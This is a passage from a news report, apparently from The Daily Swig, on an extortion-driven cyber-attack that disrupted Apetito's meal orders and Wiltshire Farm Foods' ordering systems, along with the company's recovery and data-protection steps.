As expected, Monday’s Apetito deliveries to businesses, including other ‘meals-on-wheels’ operators, proceeded normally “as these orders were already picked” before systems were disrupted.

On the production front, “a significant but restricted” program was up and running as of yesterday.

Meal orders submitted by businesses after 7.30pm on Friday “should be assumed not to have been received”, said Freeston.

Wiltshire Farm Foods is apparently unable to take orders over the phone or via its website and app, with fulfilment new orders expected to resume from July 4.

**‘Designed to extort money’**

Apetito, announced on Sunday (June 26) that it shut down many IT systems following the cyber-attack, which was “designed to extort money from the company”.

The company said it was “building new hardware and software to replace the affected systems”, which did not include its UK Microsoft systems, while “email communication is fully functional”.

RELATED Ransomware market evolution results in fewer variants, but rise in off-the-shelf cybercrime kits continues

It was also “seeking to establish whether any personally identifiable information (PII) has been compromised” and would alert customers and the Information Commissioner’s Office (ICO) if necessary.

Freeston said he was confident that payment card data was not compromised since this data was not held on Apetito’s systems.

“Our crisis management team is meeting multiple times each day to review progress, direct resources and respond to emerging issues”, he continued, adding that Apetito would continue providing updates at least daily.

“I would like to thank our customers and other contacts who are being so supportive during this issue. Our team continue to work tirelessly on the recovery and I am very grateful for their amazing efforts.”

Apetito declined to comment further when contacted by The Daily Swig.

YOU MIGHT ALSO LIKE Statutory defense for ethical hacking under UK Computer Misuse Act tabled

Tag

#pdf